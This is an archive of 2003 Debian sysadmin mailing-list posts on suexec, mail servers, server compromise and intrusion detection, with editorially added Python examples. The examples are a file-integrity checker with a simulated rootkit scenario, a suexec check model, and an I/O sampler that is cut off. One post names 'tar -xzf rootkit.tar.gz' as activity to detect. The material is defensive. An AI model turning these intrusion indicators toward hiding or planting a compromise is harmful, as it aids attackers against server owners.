Re: Slightly OT: They're forcing me to install Red Hat

2003-06-17 Thread Dan MacNeil

I've spent time in both redhat & debian (though mostly in debian)

apt-get update ; apt-get upgrade -s ; apt-get upgrade # if OK

...is zero $

up2date # $50 per year per machine.
# fewer built in packages

If $ is a concern to your boss, then postgres is probably the equal of
oracle for most people. Postgres is supported on debian.

Another factor, moving from potato to woody was trivial.

I **think** the upgrade process for redhat involves fdisk but this may
be different for the $500 enterprise version.


On Tue, 17 Jun 2003, Tomàs Núñez Lirola wrote:

> Hi
> My boss is forcing me to install Red Hat. I am the sysad, and I personally
> prefer Debian, but it doesn't seem to be a reason for him. He worries about
> Oracle not giving support to Debian users. But we don't have any Oracle
> server, he worries for the future.
> So, can you give me reasons to convince him to install Debian? I don't know
> Red Hat very well, because I've never felt comfortable with it (but this
> doesn't seem to be a reason for anyone :( ).
>
> Sorry for the slightly OT




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Frozen Food Delivery Canada

2003-06-18 Thread Dan MacNeil

> Must resist urge to call them.. *twitch*

Since there is a small chance they are being DOS'd via forgery this would
be a good urge to resist.


On Wed, 18 Jun 2003, Splash Tekalal wrote:

> At 12:26 PM 6/18/2003 -0400, you wrote:
> >NORSEMAN CARTAGE LTD.
> >2458 HAINES RD
> >MISSISSAUGA, ONTARIO, CANADA
> >L4Y 1Y6
> >(905)275-0093
> >WWW.NORSEMANCARTAGE.COM
>
> Must resist urge to call them.. *twitch*



review host based intrusion detection systems

2003-06-21 Thread Dan MacNeil

Doing an apt-cache search on "tripwire" and "intrusion"

I came up with these packages:

aide
bsign
fcheck
integrit

I've googled around a bit but haven't found much evaluation...

Does anyone have opinions on them?

We're setting up 3 new servers and I want to have an intrusion
detection database.

Ease of use is much, much more important than perfect security.

A while back we installed tripwire from tarball on one system but let it
get out of date. At another job, they had a homegrown system that was very
cumbersome -- lots and lots of false alarms and a pain to update.

Of course it would be extra valuable if you could compare and contrast two
or more of these packages.





Re: CGI and PHP Scripts

2003-06-24 Thread Dan MacNeil

> (I have tried using suexec as it is installed with the Debian Apache
> package, but when I tried to execute a script in a virtual host, not
> using the www.domain.com/~username address, it did not execute the
> script, saying it was not in the document root.  Does anyone know what


the default document root is

/var/www

If you are setting up apache from scratch, I'd use the default as it
avoids much hassle w/ suexec.

If you want to use a different default docroot you need to recompile
suexec

For our approach see:

http://csl.ltc.org/sys/project.d/suexec.d/install.txt



On Tue, 24 Jun 2003, Anand Atreya wrote:

> Hi,
>
> I have just recently begun using Debian and am in the process of
> migrating a FreeBSD 4.4 server over to it.  This server had many
> different users and allowed them to execute CGI and PHP scripts in their
> public_html folder (or any folder under it) as their own user, not as
> the user of the webserver, using mod_cgiwrap and mod_phpcgiwrap (from
> Steven Haryanto).  The site where this was located
> (http://steven.haryan.to/mod_cgiwrap/mod_cgiwrap.html) no longer exists,
> and in hindsight, it seems as if mod_cgiwrap was not a very secure
> solution to begin with.
> Does anybody have any recommendations on how to set up a virtual hosting Apache 
> server such that users can have CGI and PHP scripts execute as themselves, without 
> having to put #!/usr/bin/php at the top of php scripts, and that is completely 
> transparent to the user, also allowing them to place scripts anywhere in their 
> document root?
> (I have tried using suexec as it is installed with the Debian Apache
> package, but when I tried to execute a script in a virtual host, not
> using the www.domain.com/~username address, it did not execute the
> script, saying it was not in the document root.  Does anyone know what
> the default document root is for the Debian configuration of suexec?)
>
> Thanks a lot.
> -- Anand Atreya



Re: Server hacked - next...?

2003-06-30 Thread Dan MacNeil

chkrootkit is also available through apt-get

apt-get install chkrootkit


##

On Sun, 29 Jun 2003, Jason Lim wrote:

> Hi Russell,
>
> Well, SE Linux certainly seems like something that needs to be installed.
> Most annoying is that all the recent security updates were already done!
>
> The user CGIs run as the user's UID... suexec.
>
>
> Re-installing from scratch would be a real pain... the server runs on a
> 3ware array, and has hundreds of users, all active :-/
>
> Is there any way to verify the Integrity of the files somehow, and
> download/re-install any binaries that do not match the checksums or
> something? Does dpkg or some other Debian tool have this ability?
>
> If just a list of packages could be shown that do not match what is
> actually on the disk, those could be re-downloaded and re-installed, so at
> least the system can start working (right now, just typing "gcc" produces
> garbage on the screen, no doubt because some libraries have been
> replaced).
>
> Is there any tool that could search the system for root suid scripts (so
> the hacker can login again and gain root easily)?
>
>
> Hope you can shed some light on the above, so at least the system can get
> back up and running, then we can even setup a new server (with SE Linux
> and various others) and migrate the accounts over.
>
> Thanks in advance!!!
>
> Sincerely,
> Jason
>
> - Original Message -
> From: "Russell Coker" <[EMAIL PROTECTED]>
> To: "Jason Lim" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
> Sent: 29 June, 2003 4:02 PM
> Subject: Re: Server hacked - next...?
>
>
> > On Sun, 29 Jun 2003 17:12, Jason Lim wrote:
> > > The box is a very recently updated "stable" box... virtually every
> > > other date apt-get is update/upgrade.
> > >
> > > The box is setup very secure... the usual things were done... like
> > > ensuring no unused services are running and things like that.
> > >
> > > So does that mean "stable" is actually vulnerable to something we all
> > > don't know about???
> >
> > That could be the case.
> >
> > Or it could be some issue of your configuration.  Maybe you have Apache
> > set to run customer cgi-bin scripts under the same UID and a customer
> > uploaded an insecure or hostile cgi-bin script.
> >
> > Have you considered using SE Linux?
> >
> > --
> > http://www.coker.com.au/selinux/   My NSA Security Enhanced Linux packages
> > http://www.coker.com.au/bonnie++/  Bonnie++ hard drive benchmark
> > http://www.coker.com.au/postal/    Postal SMTP/POP benchmark
> > http://www.coker.com.au/~russell/  My home page
> >
> >
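Added example, not from either thread: the 2003-06-21 question asks which of aide, bsign, fcheck and integrit to pick, and Jason's message above asks how to verify file integrity and find setuid binaries on a box that is already compromised. All of those tools reduce to the same loop, which this Python sketch implements: record a baseline of hash, size, mode and ownership for every file under chosen directories, keep that baseline somewhere the host cannot rewrite, and later diff the live tree against it, flagging anything that has newly become setuid or setgid. Two caveats matter more than the tool choice. A baseline built after the break-in only tells you about the next change, so it has to come from the clean install or from package contents fetched from a clean mirror (Debian's debsums compares against the md5sums each package ships, but an intruder with root can rewrite those under /var/lib/dpkg/info as easily as the binaries). And on the suspect box the tools you would check with (ls, md5sum, find, the interpreter running this) are exactly what a rootkit replaces, so run the comparison from rescue media or over a mounted copy of the disk. The demo() scenario is constructed in a temporary directory and touches no real system files.

```python
"""File-integrity baseline and diff in the style of tripwire/aide (added example)."""
import hashlib
import json
import os
import stat
import tempfile

# Attributes recorded per file; a change in any of them is reported.
_FIELDS = ("sha256", "size", "mode", "uid", "gid")
_SETID = stat.S_ISUID | stat.S_ISGID


def _file_record(path):
    """Hash a regular file and capture the metadata tripwire-style tools compare."""
    st = os.lstat(path)
    rec = {"size": st.st_size, "mode": st.st_mode, "uid": st.st_uid, "gid": st.st_gid,
           "sha256": None}  # stays None for symlinks, devices, sockets: metadata only
    if stat.S_ISREG(st.st_mode):
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(1 << 16), b""):
                h.update(chunk)
        rec["sha256"] = h.hexdigest()
    return rec


def build_baseline(roots):
    """Walk the given directories and record every file found under them."""
    baseline = {}
    for root in roots:
        for dirpath, _dirnames, filenames in os.walk(root):
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    baseline[path] = _file_record(path)
                except OSError:
                    continue  # unreadable or vanished entries are skipped, not fatal
    return baseline


def save_baseline(baseline, path):
    """Write the baseline; the copy you compare against belongs off-host or on read-only media."""
    with open(path, "w") as f:
        json.dump(baseline, f, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def compare(baseline, current):
    """Diff two baselines: added/removed/changed paths, plus files that newly became setuid/setgid."""
    report = {"added": [], "removed": [], "changed": {}, "new_setid": []}
    for path, rec in current.items():
        old = baseline.get(path)
        if old is None:
            report["added"].append(path)
        else:
            diff = [k for k in _FIELDS if old.get(k) != rec.get(k)]
            if diff:
                report["changed"][path] = diff
        was_setid = old is not None and old["mode"] & _SETID
        if rec["mode"] & _SETID and not was_setid:
            report["new_setid"].append(path)
    report["removed"] = sorted(set(baseline) - set(current))
    return report


def demo():
    """Constructed scenario in a temp dir: ps trojaned, a new file dropped, netstat made setuid.

    Returns the report keyed by basename so it reads the same on any machine."""
    with tempfile.TemporaryDirectory() as d:
        bin_dir = os.path.join(d, "bin")
        os.mkdir(bin_dir)
        for name in ("ls", "ps", "netstat"):
            with open(os.path.join(bin_dir, name), "wb") as f:
                f.write(b"#!/bin/sh\nexec /bin/" + name.encode() + b" \"$@\"\n")
            os.chmod(os.path.join(bin_dir, name), 0o755)
        baseline = build_baseline([bin_dir])
        # what a simple rootkit does: patch ps, drop a backdoor, leave a setuid binary behind
        with open(os.path.join(bin_dir, "ps"), "ab") as f:
            f.write(b"# filtered: hides the backdoor's process\n")
        with open(os.path.join(bin_dir, "bindshell"), "wb") as f:
            f.write(b"\x7fELF...")  # constructed placeholder for a dropped binary
        os.chmod(os.path.join(bin_dir, "netstat"), 0o4755)
        report = compare(baseline, build_baseline([bin_dir]))
    base = os.path.basename
    return {
        "added": sorted(base(p) for p in report["added"]),
        "removed": sorted(base(p) for p in report["removed"]),
        "changed": {base(p): v for p, v in report["changed"].items()},
        "new_setid": sorted(base(p) for p in report["new_setid"]),
    }
```

On a real host you would run build_baseline over /bin, /sbin, /usr/bin, /usr/sbin, /lib and /etc right after installation, save_baseline to removable media, and later diff against load_baseline of that copy; a baseline that lives on the monitored disk is only as trustworthy as the disk.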



Re: Anyone running Exim 3.3x + Mysql Virtual users?

2003-07-01 Thread Dan MacNeil

I had a similar experience, decided to look at postfix and then never
looked back.


On Mon, 30 Jun 2003, Dustin Douglas wrote:

> I've got the chance to set up a brand new email server for one of our
> clients, and being the forward thinking sysadmin that I am, I don't
> want to go with the old standby Sendmail, I've got 2 of the beasts
> already, and don't want another.
>
> I've been looking at Exim in Debian Stable and it looks pretty good,
> but I'm getting bogged down trying to get everything configured
> properly, and I want to give Exim a fair shot. I don't want to give up
> on it just because I'm missing something.
>
> So, anyone have any good pointers to cookbook/HOWTO type docs about
> setting up Mysql & Exim with an eye towards virtual users? I've seen
> some guides for Exim 4.1x, but Stable uses the older 3.3x line, and
> I'd very much like to keep the install as stock as possible.
>
> Thanks for any pointers...
>
> Have a good one.



Re: Wrapping CGI and PHP Scripts

2003-07-02 Thread Dan MacNeil

>Does anyone know what the default document
>root is for the Debian configuration of suexec?

/var/www/

To change the document root of suexec you need to recompile suexec see:

http://communitysoftwarelab.org/sys/project.d/suexec.d/install.txt

###
On Wed, 2 Jul 2003, Anand Atreya wrote:

> Hi,
>
> I have just recently begun using Debian and am in the process of
> migrating a FreeBSD 4.4 server over to it.  This server had many different
> users and allowed them to execute CGI and PHP scripts in their public_html
> folder (or any folder under it) as their own user, not as the user of the
> webserver, using mod_cgiwrap and mod_phpcgiwrap (from Steven Haryanto).  The
> site where this was located
> (http://steven.haryan.to/mod_cgiwrap/mod_cgiwrap.html) no longer exists, and
> in hindsight, it seems as if mod_cgiwrap was not a very secure solution to
> begin with.
> Does anybody have any recommendations on how to set up a virtual hosting
> Apache server such that users can have CGI and PHP scripts execute as
> themselves, without having to put #!/usr/bin/php at the top of php scripts,
> and that is completely transparent to the user, also allowing them to place
> scripts anywhere in their document root?
> (I have tried using suexec as it is installed with the Debian Apache
> package, but when I tried to execute a script in a virtual host, not using
> the www.domain.com/~username address, it did not execute the script, saying
> it was not in the document root.  Does anyone know what the default document
> root is for the Debian configuration of suexec?)
>
> Thanks a lot.
> -- Anand Atreya



Re: Wrapping CGI and PHP Scripts

2003-07-02 Thread Dan MacNeil

> If only this could be in a configuration file..

What is worse is that every time there is a security patch for apache, we
break our hand compiled suexec

On Thu, 3 Jul 2003, Jason Lim wrote:

>
>
> >
> > >Does anyone know what the default document
> > >root is for the Debian configuration of suexec?
> >
> > /var/www/
> >
> > To change the document root of suexec you need to recompile suexec see:
> >
> > http://communitysoftwarelab.org/sys/project.d/suexec.d/install.txt
>
>
> If only this could be in a configuration file..



Re: Wrapping CGI and PHP Scripts

2003-07-02 Thread Dan MacNeil

We use the shbang...

On Wed, 2 Jul 2003, Anand Atreya wrote:

> Any recommendations on how to do this with PHP - without needing the
> #!/usr/bin/php at the top and without using PHP Safe mode - which is a lame
> workaround...?
>
> -- Anand
>
> - Original Message -
> From: "Dan MacNeil" <[EMAIL PROTECTED]>
> To: "Jason Lim" <[EMAIL PROTECTED]>
> Cc: "Anand Atreya" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
> Sent: Wednesday, July 02, 2003 9:33 PM
> Subject: Re: Wrapping CGI and PHP Scripts



Re: mod_perl and mod_asp

2003-07-11 Thread Dan MacNeil

One reason to avoid mod_perl is memory consumption. CGI scripts take up
memory only when they are running -- you can have hundreds of CGI scripts
on your server.  When we moved to mod_perl our apache processes went from
taking about 3M each to about 8M each. With 100 processes this might be
an issue for you.

On the other hand if you are running a cgi script more than twice a
second, mod_perl is a big win.

To answer your question, putting SSL & mod_perl on the same server
works fine for us. You might think of separate servers for CGI and
mod_perl though.


On Fri, 11 Jul 2003, Rod Rodolico wrote:

> Ok, this is likely a major stupid question.
>
> I need mod_asp for my apache 1.3 server. I installed mod_perl and mod_asp
> via dselect on my development server, but see no configuration changed in
> httpd.conf. I see no sign that mod_perl or mod_asp were installed, and
> have discovered no way to see what modules are loaded by an instance of
> apache.
>
> Is mod_perl loaded via some kind of pfm? I have rtfm'd, but haven't seen
> anything on the mod_perl v1 being loaded as a module.
>
> I basically have no clue what is going on here. Is it loaded? Is there a
> way to verify it? Or, do I need to add a LoadModule mod_perl entry. I
> tried that, but mod_perl was not found in mod_perl.so
>
> Finally, is there any reason I should not build a mod_perl & mod_ssl
> version of apache? I use ssl on some of my sites, and I write a lot of
> perl cgi scripts. Currently, my production server has an apache-ssl and a
> standard apache server running (two servers), and I need the ability to
> run perl on both. I'm thinking I should have only one server, with the
> ability to run ssl and perl. Suggestions?
>
> Thanks
>
> Rod



storage server howto?

2003-07-25 Thread Dan MacNeil

We want to create a debian based storage server and mount /var/www/
/home and other directories from it onto other servers and workstations.

Right now we're looking at samba, autofs, amd, smbfs. We've heard bad
things about NFS security, but maybe we haven't looked at it close enough.

What is the best way to run a storage server and mount its shares on
other machines?

Has anyone else out there had any success in using autofs or amd
in combination with smbmount to do this?

Is autofs or amd even necessary (network mount can be added as type smbfs
in fstab)?

We've looked at:

Automount mini-Howto
http://www.tldp.org/HOWTO/mini/Automount.html

Autofs Automounter HOWTO
http://www.linux-consulting.com/Amd_AutoFS/autofs-HOWTO.html

Tried:

modifying /etc/fstab to mount smbfs partition -- ran into the
username/password and permissions issues below

amd package -- seems to be oriented towards using NFS, but the
autofs automounter howto does mention samba towards the bottom of
section 5.3

Problems:

smbmount requires username and password - this seems to be
fixable by using a file containing credentials and making it
viewable only by the owner

permissions on mounted directory - did a sample mount and the
file permissions for home directories ended up being 755 root
root instead of 755 user group - perhaps this problem can be
remedied by the machines sharing the same passwd and shadow files
(in the long run LDAP will be used)





apt-get update failure???

2003-09-18 Thread Dan MacNeil

We've a couple of debian systems to patch for the new sshd problems.

One of them is monitored closely and patched quickly. The other is
patched less quickly.

The system that is patched less quickly claims to be up to date but nobody
remembers patching it. There are some weird things about file sizes &
strings on the less closely monitored system. Are we missing something?

apt-get update; apt-get upgrade;
[snip]
0 packages upgraded, 0 newly installed, 0 to remove and 0  not upgraded.


I've looked (quickly) at the man pages, but am a bit short of sleep and
have probably missed some basic answers.

Where are the logs?

Is there a way to force a package update/re-install?

Further some important files have different sizes

# less closely monitored system
-rwxr-xr-x1 root root   230216 Oct 13  2002 /usr/bin/ssh

# more closely monitored system
-rwxr-xr-x1 root root   230248 Sep 16 22:07 /usr/bin/ssh


and different strings:

# less closely monitored
#strings /usr/bin/ssh | grep OpenSSH
 OpenSSH_3.4p1 Debian 1:3.4p1-4
 OpenSSH_3.4p1 Debian 1:3.4p1-4

# more closely monitored
#strings /usr/bin/ssh | grep OpenSSH
 OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.2
 OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.2


# both systems have sources.list as:

deb http://debian.lcs.mit.edu/debian woody main contrib non-free
deb http://http.us.debian.org/debian woody main contrib non-free
deb http://security.debian.org/ woody/updates main contrib non-free
deb http://non-us.debian.org/debian-non-US stable/non-US main contrib non-free





Re: removable caddies

2003-09-30 Thread Dan MacNeil

>information regarding the removable caddies?
>
> I am interested for information, specs, and esp uses and suppliers.  IS


---
Here's a bit recycled from something I did for a youth center

Dunno if it works for you in Oz.  Google is my only connection with the
vendor.

---

Hard drive drawers and caddies.

These allow you to quickly swap hard drives without tools or futzing with
jumpers. The more expensive models let you swap hard drives in and out
while the computer is running.

The benefits of removable hard drives are:

1) Most of the benefit of several completely
   different computer setups at the cost of
   several hard drives.

2) Simpler disc imaging. If a computer setup is bad
   you can pull the hard drive, replace it with one
   from the shelf, stick the misconfigured hard drive
   into an 'imaging' station and restore it and put it
   on the shelf.

These are the ones I've used for a couple of years. I've had a couple of
recycled 5-6 year old hard drives fail (maybe because they were dropped on
the floor). The keys tend to wear out, but since you get extra keys this
isn't a big deal.

http://www.provantage.com/buy-7STRP007-ata-66-100-plastic-hard-drive-drawer-w-fan-startech-computer-parts-ide66basic-shopping.htm

This model is more expensive but perhaps more durable and certainly
more stylish.
http://www.provantage.com/buy-7STRP071-startech-computer-parts-black-removable-ide-drive-drawer-rugged-w-shock-absorbers-drw113atabk-shopping.htm

This model is made of metal instead of plastic and is probably more
durable still. However, I wouldn't use the hot swapping software.

http://www.provantage.com/buy-7STRP06Y-startech-computer-parts-black-aluminum-ide-drive-drawer-w-shock-absorbers-drw115atabk-shopping.htm






Re: CGI and Virtual Hosts

2003-10-03 Thread Dan MacNeil


You probably want to run suexec which runs cgi as a specific user.

Our project docs --including links to the real docs are here:

http://www.communitysoftwarelab.org/sys/project.d/suexec.d/

It is easy if you have not changed DocumentRoot from /var/www




On Fri, 3 Oct 2003, Antonin Karasek wrote:

> Hi,
> I want to enable CGI on my web-hosting server, but I can't find out a good
> security model (permissions of files). I don't want files to be readable for
> others and don't want CGI to run as apache's group. The main problem is, that
> the files must belong to the same group as CGI is run.
>
> The best solution could be to chroot CGI scripts, but Apache can't do this
> (I think).
>
> Could anybody send me some useful links?
>
> Many thanks
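What suexec actually refuses, as an added example that is not part of this thread or of Apache's own code: the suexec replies of 2003-06-24, 2003-07-02 and the one above all hinge on the same point, that Apache 1.3's suexec compiles in its document root and its minimum uid/gid and checks every CGI against them at exec time. That is why a script under /home/sites/... fails with "command not in docroot" once DocumentRoot moves away from /var/www, and why the ~username form keeps working (there the allowed root is the user's public_html instead). The Python below models the main checks from suexec.c over a constructed in-memory table standing in for stat() results, so it runs anywhere and shows which condition a given layout trips. DOC_ROOT=/var/www, USERDIR_SUFFIX=public_html and UID_MIN=GID_MIN=100 are assumed values for the Debian build; the paths and uids in demo() are constructed, except that 33 is www-data on Debian.

```python
"""Model of the checks Apache 1.3's suexec makes before running a CGI (added example)."""
import posixpath
import stat
from dataclasses import dataclass

# Compile-time settings of suexec; these particular values are assumed for the example.
DOC_ROOT = "/var/www"
USERDIR_SUFFIX = "public_html"
UID_MIN = 100
GID_MIN = 100


@dataclass
class Entry:
    """Stand-in for the fields of a stat() result that suexec looks at."""
    uid: int
    gid: int
    mode: int  # full st_mode, including the file-type bits


def _under(path, root):
    root = root.rstrip("/")
    return path == root or path.startswith(root + "/")


def suexec_check(fs, script, uid, gid, home_dir=None):
    """Return the reasons suexec would refuse to exec `script` as uid/gid; [] means it runs.

    `fs` maps absolute paths to Entry. `home_dir` set means the ~user form, where the
    allowed root becomes <home>/public_html instead of the compiled-in DOC_ROOT."""
    errors = []
    if uid == 0 or uid < UID_MIN:
        errors.append("cannot run as forbidden uid %d" % uid)
    if gid == 0 or gid < GID_MIN:
        errors.append("cannot run as forbidden gid %d" % gid)
    # suexec chdir()s into the script's directory and compares that against the root
    directory = posixpath.dirname(script)
    root = posixpath.join(home_dir, USERDIR_SUFFIX) if home_dir else DOC_ROOT
    if not _under(directory, root):
        errors.append("command not in docroot (%s)" % directory)
    d = fs.get(directory)
    f = fs.get(script)
    if d is None:
        errors.append("cannot stat directory")
        return errors
    if f is None:
        errors.append("cannot stat program")
        return errors
    if d.mode & stat.S_IWOTH:
        errors.append("directory is writable by others")
    if f.mode & stat.S_IWOTH:
        errors.append("file is writable by others")
    if f.mode & (stat.S_ISUID | stat.S_ISGID):
        errors.append("file is either setuid or setgid")
    if (d.uid, d.gid) != (uid, gid) or (f.uid, f.gid) != (uid, gid):
        errors.append("target uid/gid (%d/%d) mismatch with directory or program" % (uid, gid))
    return errors


def demo():
    """Constructed file table covering the layouts discussed in the thread."""
    reg, dr = stat.S_IFREG, stat.S_IFDIR
    fs = {
        "/var/www/cgi-bin": Entry(1001, 1001, dr | 0o755),
        "/var/www/cgi-bin/hello.cgi": Entry(1001, 1001, reg | 0o755),
        "/home/sites/example/cgi-bin": Entry(1002, 1002, dr | 0o755),
        "/home/sites/example/cgi-bin/hello.cgi": Entry(1002, 1002, reg | 0o755),
        "/home/bob/public_html/cgi-bin": Entry(1003, 1003, dr | 0o755),
        "/home/bob/public_html/cgi-bin/hello.cgi": Entry(1003, 1003, reg | 0o777),
        "/var/www/shared/cgi-bin": Entry(33, 33, dr | 0o755),
        "/var/www/shared/cgi-bin/hello.cgi": Entry(33, 33, reg | 0o755),
    }
    return {
        # the easy case the thread recommends: DocumentRoot left at /var/www
        "under_docroot": suexec_check(fs, "/var/www/cgi-bin/hello.cgi", 1001, 1001),
        # the per-site layout from the thread with DOC_ROOT still compiled as /var/www
        "vhost_outside_docroot": suexec_check(
            fs, "/home/sites/example/cgi-bin/hello.cgi", 1002, 1002),
        # ~user form is allowed, but a mode 777 script is refused
        "userdir_world_writable": suexec_check(
            fs, "/home/bob/public_html/cgi-bin/hello.cgi", 1003, 1003, home_dir="/home/bob"),
        # files owned by the web server user itself: uid below UID_MIN
        "owned_by_www_data": suexec_check(fs, "/var/www/shared/cgi-bin/hello.cgi", 33, 33),
    }
```

The uid/gid mismatch and writable-by-others checks are the ones that bite after a careless chown or chmod in a customer's directory; the docroot check is the one that needs a recompile to change, which is what the thread is complaining about.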



Re: CGI and Virtual Hosts

2003-10-03 Thread Dan MacNeil

> has documentation on it.  As far as I've experienced, you need 1 IP address
> per user, but I hear you can run any number of users off the same IP
> address.

We are running many sites w/ suexec on (1) IP number.



NameVirtualHost 129.63.24.92

# The <Macro>, <VirtualHost> and <Directory> container lines below were
# stripped by the list archive and are restored here; the macro argument
# order is assumed from the $host/$directory usage.
<Macro Site $host $directory>
<VirtualHost 129.63.24.92>
   ServerAdmin [EMAIL PROTECTED]
   ServerName $host
   ServerAlias www.$host
   DocumentRoot /home/sites/$directory/doc_root
   User $directory
   Group $directory

   ErrorLog /var/log/apache/sites/$directory/error.log
   CustomLog /var/log/apache/sites/$directory/referer.log referer
   CustomLog /var/log/apache/sites/$directory/combined.log combined

   Alias /reports /home/sites/$directory/reports

   ScriptAlias /cgi-bin /home/sites/$directory/cgi-bin
   <Directory /home/sites/$directory/cgi-bin>
      AllowOverride None
      Options IncludesNOEXEC ExecCGI
   </Directory>

   ScriptAlias /kwiki /home/sites/$directory/kwiki
   <Directory /home/sites/$directory/kwiki>
      DirectoryIndex index.html
      AllowOverride None
      Options IncludesNOEXEC ExecCGI
   </Directory>
</VirtualHost>
</Macro>


On Fri, 3 Oct 2003, Daxal Communications - Surf the USA wrote:

> Apache has increased CGI security by means of suexec.  The Apache website
> has documentation on it.  As far as I've experienced, you need 1 IP address
> per user, but I hear you can run any number of users off the same IP
> address.
>
> If you discover how to enable suexec to allow any number of users to use the
> same IP address, I'd be interested.  I am currently using mass virtual
> hosting with %0 as a virtualscriptalias and virtualdocumentroot delimiter.
> eg, /var/webhosting/%0/docroot/
>
> Cheers,
>
>
> Scott
>
> - Original Message -
> From: "Antonin Karasek" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Friday, October 03, 2003 1:38 PM
> Subject: CGI and Virtual Hosts



Re: CGI and Virtual Hosts

2003-10-03 Thread Dan MacNeil

> Can I ask, how many Virtual Hosts are you handling on one computer? I think
> it can't be very effective (see my previous mail).

We're doing about 50 virtual hosts that are very lightly used.

> This solution is nice, but it's using PerChild module - I think.

As far as I know we are not using anything called PerChild module --just
straight suexec which is called to execute each cgi script.


> I don't see any SuexecUserGroup directive :o)

   User $directory
   Group $directory

We're also using mod_macro and mod_include

in /etc/httpd.conf there is a line like:

include /etc/apache/sites.txt


In the /etc/sites.txt: there are lines like:

Use Site eldermental eldermentalhealth.org

--The include lines are after the macro definitions.


#

On Fri, 3 Oct 2003, Antonin Karasek wrote:

> I don't see any SuexecUserGroup directive :o)
>
> This solution is nice, but it's using PerChild module - I think.
>
> Can I ask, how many Virtual Hosts are you handling on one computer? I think
> it can't be very efective (see my previous mail).



Re: CGI and Virtual Hosts

2003-10-04 Thread Dan MacNeil


>Why is this doubled? Is this intentional?

Copy and paste slip. In the config file they are not doubled.

On Sat, 4 Oct 2003, Marcin Owsiany wrote:

> On Fri, Oct 03, 2003 at 04:40:51PM -0400, Dan MacNeil wrote:
> >
> > AllowOverride None
> > Options IncludesNOEXEC ExecCGI
> >
> [...]
> >
> > DirectoryIndex index.html
> > AllowOverride None
> > Options IncludesNOEXEC ExecCGI
> >
>
> Why is this doubled? Is this intentional?
>
> Marcin



Re: two nic same server

2003-10-09 Thread Dan MacNeil

I can't answer your question for sure, but have a vaguely similar
question about two network cards in the same server.

We have (2) nics in our main server. One faces our internal network and
runs samba & the like, the other faces the outside world and runs apache
and the like.

The internal network has a separate NAT gateway on a completely different
machine.

To get this setup to work we needed a:

route add default gw 129.63.24.254

...which is in /etc/init.d/rc.local

Putting the gateway in /etc/network/interfaces didn't work.

When we reboot, everything is fine. When people do an ifup eth1, things
don't work unless they also run rc.local. People have a habit of
forgetting the rc.local bit...

We could easily wrap ifup with something like:

#!/bin/sh
# this ifup is in path before /sbin/ifup
# bring the interface up first: the gateway is only reachable once it is

/sbin/ifup "$@"
route add default gw 129.63.24.254

...but I am concerned that we will then forget this information.

1) In general does it make sense to avoid hiding too many config details?
2) Is there a better way to do this than in rc.local?



On Wed, 8 Oct 2003, Leonardo Boselli wrote:

> I have a server that has two network addresses.
> Depending on the network the call originates from, one or the other or
> both addresses could be accessible.
> How should I arrange the two addresses in the DNS so that a client, if it does
> not find the first one, would try the second? (I do not need load
> balancing but just increased availability; the 2nd channel is very slow ...)
> --
> Leonardo Boselli
> Nucleo Informatico e Telematico del Dipartimento Ingegneria Civile
> Universita` di Firenze , V. S. Marta 3 - I-50139 Firenze
> tel +39 0554796431 cell +39 3488605348 fax +39 055495333
> http://www.dicea.unifi.it/~leo


Re: two nic same server

2003-10-09 Thread Dan MacNeil

Rod & Frode,

Thanks for your help. (Rod, I took the liberty of replying to
the list w/o your email, as your answer may be helpful
to other people.)

=
Frode Haugsgjerd wrote:

see the manpage interfaces(5), specifically the up command.

auto eth1
iface eth1 inet static
...
up route add default gw 129.63.24.254

and:

On Thu, 9 Oct 2003, Rod Rodolico wrote:

> put the route command in /etc/network/interfaces. There is a command that executes
> arbitrary commands when ifup (or ifdown) is called. See following example from one
> of my machines.
>
> iface eth0 inet static
> address 67.66.8.41
> netmask 255.255.255.248
> network 67.66.8.120
> broadcast   67.66.8.127
> up  /sbin/route add -host 67.66.8.41 eth0
> gateway 67.66.8.46
>

Re: [Cadre-config] Re: two nic same server

2003-10-09 Thread Dan MacNeil

You can't do precisely what you want with DNS.

You can define two A records with two IP#s for the same host.

The DNS server will alternate the IP address it hands out ("round robin
DNS").

There are ways to do what you want, but:

A) I don't know any of the details
B) It might be easier/cheaper to get a single better network connection


On Fri, 10 Oct 2003, Leonardo Boselli wrote:

> On Thu, 9 Oct 2003, Dan MacNeil wrote:
> > Rod & Frode,
> > Thanks for your help. (Rod I took the liberty of replying to
> > the list w/o without your email as your answer may be helpful
> > to other people.)
> Hey ! My question was different.
> I appreciate your help, but my original question was different:
> I have one machine that is accessible either with an address a.b.c.d or
> with an address e.f.g.h .
> The first one has a very good connection but at certain times, for
> periods between a few minutes and some hours, could be unreachable from
> some networks. The second connection is much more viable, but is very
> slow.
> The question was: how can I set up DNS so any client would use the first
> connection, unless it is unreachable for more than 2 minutes, in which
> case it would use the second one ?
>
>
> ___
> Cadre-config mailing list
> [EMAIL PROTECTED]
> http://lists.ltc.org/mailman/listinfo/cadre-config


command logging

2003-10-28 Thread Dan MacNeil

For a box that will have limited shell access, I'm looking for something
that will log all commands. The sudo log is nice but not everything is run
through sudo.

There won't be many privacy issues as most users won't have shell.

The goal is to review a daily report for anything unexpected: stuff like:

tar -xzf rootkit.tar.gz

tracking down i/o sucking process

2003-11-03 Thread Dan MacNeil

I'm sure this info is googlable but after 30 minutes I can't find it...

I can hear the discs on the server going wild, I run:

sar -d 2 120

...and disc utilization is indeed higher than normal. How do I find what
process is driving up the i/o load?

the command:

top

...is great for CPU & RAM but doesn't do disc...


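The question above has the same answer today as it did then, only with better kernel support: from Linux 2.6.20 on, /proc/<pid>/io carries per-process I/O counters (the 2.4 kernel in the post has none), and iotop is essentially a loop over them. The script below is an added example, not code from the original post or from iotop: it samples those counters twice and ranks processes by the bytes that actually reached the block layer. Reading other users' counters needs root; the parsing and ranking functions work on plain text and dicts, so they can be exercised without it.

```python
"""Find which processes are driving disk I/O by sampling /proc/<pid>/io
twice and ranking the deltas (what iotop does). Needs Linux 2.6.20 or
later with task I/O accounting; run as root to see other users' processes."""
import os
import time

IO_FIELDS = ("rchar", "wchar", "syscr", "syscw",
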